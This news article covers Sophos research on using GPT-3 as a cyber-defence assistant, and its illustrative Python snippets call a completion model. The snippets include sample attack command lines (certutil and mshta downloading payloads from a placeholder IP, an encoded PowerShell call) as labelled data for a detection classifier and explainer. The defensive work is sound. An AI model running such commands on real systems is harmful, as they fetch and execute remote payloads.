Tech & Startup

ChatGPT can be used as a cybersecurity Co-Pilot: Report

Cybersecurity company Sophos recently released new research on how the cybersecurity industry can leverage GPT-3, the large language model behind the now well-known ChatGPT chatbot, as a co-pilot to help defeat attackers.

The latest report, "GPT for You and Me: Applying AI Language Processing to Cyber Defenses," details projects developed by Sophos X-Ops that use the GPT-3 large language model to simplify the search for malicious activity in datasets from security software, filter spam more accurately, and speed up analysis of "living off the land" binary (LOLBin) attacks.

Sophos X-Ops researchers have been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders. All three use a technique called "few-shot learning" to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.
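
Sophos has not published its prototypes, but the general shape of a few-shot setup is simple: a handful of labelled examples is embedded directly in the prompt instead of being used to train a dedicated model. The sketch below illustrates the idea, assuming the legacy OpenAI Python client and a GPT-3 completion model; the commands, labels and API key placeholder are hypothetical, not Sophos's data.

```python
# Minimal few-shot classification sketch with a GPT-3 completion model.
# Assumes the legacy OpenAI Python client (openai < 1.0); the labelled
# commands below are hypothetical placeholders, not Sophos's data.
import openai

openai.api_key = "YOUR_API_KEY"

# A handful of labelled examples stands in for a large training corpus.
FEW_SHOT_EXAMPLES = [
    ("powershell.exe -enc SQBFAFgA...", "malicious"),
    ("svchost.exe -k netsvcs", "benign"),
    ("certutil.exe -urlcache -split -f http://203.0.113.10/x.exe", "malicious"),
]

def classify_command(command: str) -> str:
    """Label a command line by embedding the examples directly in the prompt."""
    prompt = "Label each command line as malicious or benign.\n\n"
    for example, label in FEW_SHOT_EXAMPLES:
        prompt += f"Command: {example}\nLabel: {label}\n\n"
    prompt += f"Command: {command}\nLabel:"

    response = openai.Completion.create(
        model="text-davinci-003",
        prompt=prompt,
        max_tokens=5,
        temperature=0,
    )
    return response.choices[0].text.strip()

print(classify_command("mshta.exe http://203.0.113.10/payload.hta"))
```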

The first application Sophos tested with the few-shot learning method was a natural language query interface for sifting through malicious activity in security software telemetry; specifically, Sophos tested the model against its endpoint detection and response product. With this interface, defenders can filter through the telemetry with basic English commands, removing the need to understand SQL or a database's underlying structure.
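
As a rough illustration of how such an interface could work (not Sophos's implementation), the sketch below asks a GPT-3 model to translate an English question into SQL against a hypothetical telemetry schema; the schema, model name and helper function are assumptions.

```python
# Sketch of a natural-language-to-query layer over endpoint telemetry.
# The table schema, model choice and helper name are illustrative
# assumptions, not Sophos's actual EDR data model or tooling.
import openai

openai.api_key = "YOUR_API_KEY"

# Hypothetical schema for a process-event telemetry table.
SCHEMA = (
    "Table process_events(timestamp TEXT, hostname TEXT, "
    "process_name TEXT, command_line TEXT, parent_process TEXT)"
)

def english_to_sql(question: str) -> str:
    """Translate a plain-English question into SQL against the schema above."""
    prompt = (
        f"{SCHEMA}\n\n"
        "Write a single SQL query that answers the question below.\n"
        f"Question: {question}\nSQL:"
    )
    response = openai.Completion.create(
        model="text-davinci-003",
        prompt=prompt,
        max_tokens=120,
        temperature=0,
    )
    return response.choices[0].text.strip()

print(english_to_sql(
    "Show all PowerShell launches on host FINANCE-01 in the last 24 hours"
))
```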

Sophos also tested a new spam filter built on GPT-3 and found that, compared with other machine learning models for spam filtering, the GPT-3-based filter was significantly more accurate.

Moreover, Sophos researchers were able to create a program that simplifies the process of reverse-engineering LOLBin command lines. Such reverse-engineering is notoriously difficult, but it is critical for understanding LOLBins' behavior and putting a stop to those types of attacks in the future.
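
Sophos has not released that program, but the underlying idea can be sketched as follows: hand the model a suspicious command line and ask for a plain-English explanation of what it does. The model name, prompt and sample certutil invocation below are illustrative assumptions, not Sophos's tooling.

```python
# Rough illustration of asking GPT-3 to explain a suspicious LOLBin
# command line in plain English. This is not Sophos's tool; the prompt
# and the sample certutil command are assumptions for demonstration.
import openai

openai.api_key = "YOUR_API_KEY"

def explain_command_line(command_line: str) -> str:
    """Ask the model what the command does and why it might be suspicious."""
    prompt = (
        "Explain, in plain English, what the following Windows command line "
        "does and whether it looks like a living-off-the-land attack:\n\n"
        f"{command_line}\n\nExplanation:"
    )
    response = openai.Completion.create(
        model="text-davinci-003",
        prompt=prompt,
        max_tokens=150,
        temperature=0,
    )
    return response.choices[0].text.strip()

# certutil abuse is a classic LOLBin pattern: a built-in Windows tool
# repurposed to download a remote payload.
print(explain_command_line(
    "certutil.exe -urlcache -split -f http://203.0.113.10/update.exe "
    "C:\\Users\\Public\\update.exe"
))
```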
